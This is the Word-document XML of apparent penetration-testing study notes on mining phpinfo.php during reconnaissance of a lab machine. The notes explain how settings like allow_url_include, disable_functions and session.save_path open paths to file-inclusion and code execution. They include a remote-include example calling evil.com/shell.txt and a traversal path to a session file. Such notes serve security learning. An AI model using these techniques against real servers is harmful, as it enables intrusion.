      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">How to find root directory in PHP</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drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="2336800"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="290" name="image276.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image276.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId62"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="233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0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1011"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Look at phpinfo.php</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2"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hactotiz4tqo" w:id="30"/>
      <w:bookmarkEnd w:id="30"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo.php</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The </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">phpinfo.php </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">file (sometimes found in </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">/phpinfo.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) can be helpful. For example, it sometimes give us the Kernel Version of the target machine, which can be used to exploit if the version is vulnerable. </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hyperlink r:id="rId63">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PG practice writeup also examines it</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000427">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="3822700"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="138" name="image130.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image130.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId64"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="3822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8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We can see that we have linux kernel : </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">4.19.0–8-amd64</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000429">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="412"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">amd64 just means 64-bit</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Most of the below is from the </w:t>
      </w:r>
      <w:hyperlink r:id="rId65">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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">System:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000430">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="1930400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="440" name="image424.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image424.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId66"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="193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1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="125"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">The hostname is SHENZI, and it is running 64-bit Windows 10 build 19042.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000432">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000433">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PATH:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000434">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="381000"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="341" name="image325.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image325.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId67"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="38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5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="429"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">We find a user named 'shenzi' in the path.</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rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen and allow_url_include:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000439">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="698500"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="555" name="image531.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image531.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId68"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="69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A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">allow_url_fopen = On</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This allows PHP functions like fopen(), file_get_contents(), and include() to access remote files over protocols like HTTP, FTP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043C">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">With this enabled, a vulnerable script using file_get_contents($user_input) could fetch remote content from an attacker-controlled URL, enabling data exfiltration or remote code delivery.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">While this alone doesn't allow code execution, it enables reading remote resources (e.g., SSRF-like behavior).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043E">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> allow_url_include = Off</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000043F">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">If it was on, you can get code execution using PHP wrapper. Look at "</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">PHP Wrappers (from OSCP 9.2.2. PHP Wrappers)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">" section for more information</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000440">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:highlight w:val="yellow"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">And if it was on, you can do LFI attack</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000441">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This controls whether PHP's include and require functions can load remote files via a URL (e.g., include("</w:t>
      </w:r>
      <w:hyperlink r:id="rId69">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">http://evil.com/shell.txt</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">")).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000442">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="170"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Since it's Off, even if you can control an include() parameter, PHP won't fetch and execute remote code from a URL.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Document_Root:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000447">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5930900" cy="304800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="137" name="image133.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image133.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId70"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="59309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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="245"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This shows the root directory</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">$_SERVER['DOCUMENT_ROOT']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044B">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5148263" cy="849793"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="414" name="image405.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image405.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId71"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5148263" cy="849793"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="507"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This is another one that should show the root directory of website</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disable_classes and disable_functions:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000044F">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="558800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="459" name="image452.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image452.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId72"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1344"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Disable_functions of 'no value' means we are able to use malicious PHP functions like exec(), system(), shell_exec() (if we can get code execution) because they have not been disabled.</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b w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">session.save_path:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000453">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="177800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="302" name="image297.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image297.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId73"/>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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This can be useful for an</w:t>
      </w:r>
      <w:hyperlink r:id="rId74">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve"> </w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId75">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:color w:val="1155cc"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">Local File Inclusion to Remote Code Execution</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability (via phpinfo.php). If we find LFI, we can keep this in mind.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000455">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1203"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">This path is where</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> PHP session files are stored</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. When a user visits a PHP application, their session data (including variables like $_SESSION['username']) gets written to a file in this directory — typically with a name like sess_&lt;session_id&gt;.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000456">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1203"/>
        </w:numPr>
        <w:ind w:left="1440" w:hanging="360"/>
        <w:rPr>
          <w:color w:val="ff0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="ff0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">../../xampp/tmp/sess_abcd1234 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">for example</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$_SERVER['HTTP_USER_AGENT']</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000459">
      <w:pPr>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr/>
        <w:drawing>
          <wp:inline distB="114300" distT="114300" distL="114300" distR="114300">
            <wp:extent cx="5943600" cy="152400"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="381" name="image395.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image395.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId76"/>
                    <a:srcRect b="0" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943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numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="554"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
